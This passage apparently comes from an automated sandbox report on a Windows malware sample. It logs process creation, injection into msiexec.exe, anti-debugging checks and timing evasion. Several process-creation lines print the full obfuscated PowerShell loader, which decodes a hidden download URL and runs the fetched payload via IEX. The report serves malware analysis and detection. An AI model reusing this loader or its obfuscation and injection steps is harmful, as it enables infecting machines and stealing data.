              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4759Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5102Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8562Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1162Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4476Thread sleep count: 3157 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4476Thread sleep time: -9471000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4476Thread sleep count: 6827 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4476Thread sleep time: -20481000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_238D10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,7_2_238D6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000007FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: powershell.exe, 00000004.00000002.2408368768.0000000007474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6!
              Source: powershell.exe, 00000002.00000002.2199088341.00000292A1FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW($%SystemRoot%\system32\mswsock.dll){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-34015
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0462D244 LdrInitializeThunk,LdrInitializeThunk,4_2_0462D244
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_238D2639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D4AB4 mov eax, dword ptr fs:[00000030h]7_2_238D4AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D724E GetProcessHeap,7_2_238D724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_238D2B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_238D2639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_238D60E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_4088.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\lahohqpsrcskvvhwhdioicctkhlgz"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vcmhhjaufkkpxkvaqovqlgwctnupsinbp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xwrzi"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$tankningerne249='knaldfilmens';;$langspytsndsejling='evoker180';;$kommunikeg='sortermuligheden';;$assuranceselskabernes='tinglysningskontorers';;$rosalies=$host.name;function recheck($norroy){if ($rosalies) {$nyvurderet='centralforeningers';$rigsdanskens=4} for ($langspyts=$rigsdanskens;;$langspyts+=5){if(!$norroy[$langspyts]){$rrflangerne++;break }$deponeringsbehovet+=$norroy[$langspyts];$bibliotekaren='trepaneringers'}$deponeringsbehovet}function vedligeholdelsesvejledningerne148($unlyrical){ .($modeordet) ($unlyrical)}$caricature58=recheck 'primnpesket tatimp .elekw';$caricature58+=recheck 'immoeastebkin cspeclf,ogiprodeschmnlastt';$udhngstag=recheck 'julemkonjo lazsubmilon l prals riau,dd/';$udbygningsplaner=recheck 'instt .thl norsfort1genn2';$langspytsncursion='cont[m,chnfat ecirctsem,.va estermesundr afvsm sialtecskr e,mpopsoilosp,ci un nar,etistamsokeatracn cosafedtg supewidorcera]for :over:s.ersm,dieskv c a bu,arlrskvhikoldtdittyprimpconfrnoblobivutidoloforbcvenuo manltstr=kult$trsturaekdspirbkjrsygrovg haknsch iaymankontgbetospljepa grlpultaniggn ejre ebor';$udhngstag+=recheck 'prim5aksi.dato0til. nege(mangw cepisavonv rkdshiroa.rawbidsspoli s ienblast mei vali1eng,0cifr.otio0ista;soci nugawsteriformnnapa6unho4 bav;hell smlxkede6 beq4smle;over krers,itv .yn:div.1unav3 exi1tryp.va o0cond)s jo asl,g pine tenc shekindkoudpo/fi,r2mult0 fo,1no d0firb0 cow1fess0fo,u1affa lagf onri jars ene aunfulykotr,lx pr /b.it1lept3s.ra1macr.dagn0';$terrestrialism=recheck 'snavur.bascathet.gnr mas- konamarrglagrefin,nt.tat';$forewings138=recheck 'spalhgenot .tatoutqpovers ch :unde/,air/hospoautof n n1 undx ppi.camaipengc okuu ast/ ablxfl,er udsvkorsfpa tr skazlevno sc,k cya/ metsgospkt.ero forrforgt in e indrb,na.li eroxheaunk.r';$langspytsnderzoner=recheck 'uroe>';$modeordet=recheck 'be biunaveukrix';$opmuntringstalernes='variolous';$orchestiidae221='\pestersome.lin';vedligeholdelsesvejledningerne148 (recheck 'skil$uni gbidrlhil ostv,bdeceamiljldall:bimemhypeecawnl,sona h,enopvet hy hudenyl,gh=be y$yngleglutninstva vi:d.aga femp stiplysadi tearvertklokarome+unfo$steao aborquaycsp ohtilleun uspe itbikuih noienerdcrical kfe ace2r dg2anic1');vedligeholdelsesvejledningerne148 (recheck 'bldd$am hgk.isleremoe tsbse va,eatl ehu: spaaa.agflaegbskorahusklsp,ravarinmegac u,fs gemncorpr cot=draw$smugfreflobutirmyt.enonpws gbis,lanh ndgkoliso in1supe3 i.c8ins,.af,es nhyptraclov rihexotvill(ch l$ callskulajemmnbethgsoulsindvpp.ogyin ptpaavsastrn eprdtandenonprs ndzu.daopa tn rkreunglrte p)');vedligeholdelsesvejledningerne148 (recheck $langspytsncursion);$forewings138=$afbalancsnr[0];$hunstiks=(recheck ' ar$suppg squlklemo b gbovera ell ,ue:pensuafgrpprimpindei negt emiyunknn arecoshsincosaxon=unmanmod emelawgo f-excaokricb afgjchloec nscarcttlben overstn,ey fjasparftc.yse cirmrema.depr$anticsalaa onsrp rtico dcmyrdap ntt vo,u ganrgimbetank5
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$tankningerne249='knaldfilmens';;$langspytsndsejling='evoker180';;$kommunikeg='sortermuligheden';;$assuranceselskabernes='tinglysningskontorers';;$rosalies=$host.name;function recheck($norroy){if ($rosalies) {$nyvurderet='centralforeningers';$rigsdanskens=4} for ($langspyts=$rigsdanskens;;$langspyts+=5){if(!$norroy[$langspyts]){$rrflangerne++;break }$deponeringsbehovet+=$norroy[$langspyts];$bibliotekaren='trepaneringers'}$deponeringsbehovet}function vedligeholdelsesvejledningerne148($unlyrical){ .($modeordet) ($unlyrical)}$caricature58=recheck 'primnpesket tatimp .elekw';$caricature58+=recheck 'immoeastebkin cspeclf,ogiprodeschmnlastt';$udhngstag=recheck 'julemkonjo lazsubmilon l prals riau,dd/';$udbygningsplaner=recheck 'instt .thl norsfort1genn2';$langspytsncursion='cont[m,chnfat ecirctsem,.va estermesundr afvsm sialtecskr e,mpopsoilosp,ci un nar,etistamsokeatracn cosafedtg supewidorcera]for :over:s.ersm,dieskv c a bu,arlrskvhikoldtdittyprimpconfrnoblobivutidoloforbcvenuo manltstr=kult$trsturaekdspirbkjrsygrovg haknsch iaymankontgbetospljepa grlpultaniggn ejre ebor';$udhngstag+=recheck 'prim5aksi.dato0til. nege(mangw cepisavonv rkdshiroa.rawbidsspoli s ienblast mei vali1eng,0cifr.otio0ista;soci nugawsteriformnnapa6unho4 bav;hell smlxkede6 beq4smle;over krers,itv .yn:div.1unav3 exi1tryp.va o0cond)s jo asl,g pine tenc shekindkoudpo/fi,r2mult0 fo,1no d0firb0 cow1fess0fo,u1affa lagf onri jars ene aunfulykotr,lx pr /b.it1lept3s.ra1macr.dagn0';$terrestrialism=recheck 'snavur.bascathet.gnr mas- konamarrglagrefin,nt.tat';$forewings138=recheck 'spalhgenot .tatoutqpovers ch :unde/,air/hospoautof n n1 undx ppi.camaipengc okuu ast/ ablxfl,er udsvkorsfpa tr skazlevno sc,k cya/ metsgospkt.ero forrforgt in e indrb,na.li eroxheaunk.r';$langspytsnderzoner=recheck 'uroe>';$modeordet=recheck 'be biunaveukrix';$opmuntringstalernes='variolous';$orchestiidae221='\pestersome.lin';vedligeholdelsesvejledningerne148 (recheck 'skil$uni gbidrlhil ostv,bdeceamiljldall:bimemhypeecawnl,sona h,enopvet hy hudenyl,gh=be y$yngleglutninstva vi:d.aga femp stiplysadi tearvertklokarome+unfo$steao aborquaycsp ohtilleun uspe itbikuih noienerdcrical kfe ace2r dg2anic1');vedligeholdelsesvejledningerne148 (recheck 'bldd$am hgk.isleremoe tsbse va,eatl ehu: spaaa.agflaegbskorahusklsp,ravarinmegac u,fs gemncorpr cot=draw$smugfreflobutirmyt.enonpws gbis,lanh ndgkoliso in1supe3 i.c8ins,.af,es nhyptraclov rihexotvill(ch l$ callskulajemmnbethgsoulsindvpp.ogyin ptpaavsastrn eprdtandenonprs ndzu.daopa tn rkreunglrte p)');vedligeholdelsesvejledningerne148 (recheck $langspytsncursion);$forewings138=$afbalancsnr[0];$hunstiks=(recheck ' ar$suppg squlklemo b gbovera ell ,ue:pensuafgrpprimpindei negt emiyunknn arecoshsincosaxon=unmanmod emelawgo f-excaokricb afgjchloec nscarcttlben overstn,ey fjasparftc.yse cirmrema.depr$anticsalaa onsrp rtico dcmyrdap ntt vo,u ganrgimbetank5
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$tankningerne249='knaldfilmens';;$langspytsndsejling='evoker180';;$kommunikeg='sortermuligheden';;$assuranceselskabernes='tinglysningskontorers';;$rosalies=$host.name;function recheck($norroy){if ($rosalies) {$nyvurderet='centralforeningers';$rigsdanskens=4} for ($langspyts=$rigsdanskens;;$langspyts+=5){if(!$norroy[$langspyts]){$rrflangerne++;break }$deponeringsbehovet+=$norroy[$langspyts];$bibliotekaren='trepaneringers'}$deponeringsbehovet}function vedligeholdelsesvejledningerne148($unlyrical){ .($modeordet) ($unlyrical)}$caricature58=recheck 'primnpesket tatimp .elekw';$caricature58+=recheck 'immoeastebkin cspeclf,ogiprodeschmnlastt';$udhngstag=recheck 'julemkonjo lazsubmilon l prals riau,dd/';$udbygningsplaner=recheck 'instt .thl norsfort1genn2';$langspytsncursion='cont[m,chnfat ecirctsem,.va estermesundr afvsm sialtecskr e,mpopsoilosp,ci un nar,etistamsokeatracn cosafedtg supewidorcera]for :over:s.ersm,dieskv c a bu,arlrskvhikoldtdittyprimpconfrnoblobivutidoloforbcvenuo manltstr=kult$trsturaekdspirbkjrsygrovg haknsch iaymankontgbetospljepa grlpultaniggn ejre ebor';$udhngstag+=recheck 'prim5aksi.dato0til. nege(mangw cepisavonv rkdshiroa.rawbidsspoli s ienblast mei vali1eng,0cifr.otio0ista;soci nugawsteriformnnapa6unho4 bav;hell smlxkede6 beq4smle;over krers,itv .yn:div.1unav3 exi1tryp.va o0cond)s jo asl,g pine tenc shekindkoudpo/fi,r2mult0 fo,1no d0firb0 cow1fess0fo,u1affa lagf onri jars ene aunfulykotr,lx pr /b.it1lept3s.ra1macr.dagn0';$terrestrialism=recheck 'snavur.bascathet.gnr mas- konamarrglagrefin,nt.tat';$forewings138=recheck 'spalhgenot .tatoutqpovers ch :unde/,air/hospoautof n n1 undx ppi.camaipengc okuu ast/ ablxfl,er udsvkorsfpa tr skazlevno sc,k cya/ metsgospkt.ero forrforgt in e indrb,na.li eroxheaunk.r';$langspytsnderzoner=recheck 'uroe>';$modeordet=recheck 'be biunaveukrix';$opmuntringstalernes='variolous';$orchestiidae221='\pestersome.lin';vedligeholdelsesvejledningerne148 (recheck 'skil$uni gbidrlhil ostv,bdeceamiljldall:bimemhypeecawnl,sona h,enopvet hy hudenyl,gh=be y$yngleglutninstva vi:d.aga femp stiplysadi tearvertklokarome+unfo$steao aborquaycsp ohtilleun uspe itbikuih noienerdcrical kfe ace2r dg2anic1');vedligeholdelsesvejledningerne148 (recheck 'bldd$am hgk.isleremoe tsbse va,eatl ehu: spaaa.agflaegbskorahusklsp,ravarinmegac u,fs gemncorpr cot=draw$smugfreflobutirmyt.enonpws gbis,lanh ndgkoliso in1supe3 i.c8ins,.af,es nhyptraclov rihexotvill(ch l$ callskulajemmnbethgsoulsindvpp.ogyin ptpaavsastrn eprdtandenonprs ndzu.daopa tn rkreunglrte p)');vedligeholdelsesvejledningerne148 (recheck $langspytsncursion);$forewings138=$afbalancsnr[0];$hunstiks=(recheck ' ar$suppg squlklemo b gbovera ell ,ue:pensuafgrpprimpindei negt emiyunknn arecoshsincosaxon=unmanmod emelawgo f-excaokricb afgjchloec nscarcttlben overstn,ey fjasparftc.yse cirmrema.depr$anticsalaa onsrp rtico dcmyrdap ntt vo,u ganrgimbetank5Jump to behavior
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerER
              Source: msiexec.exe, 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2933 cpuid 7_2_238D2933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
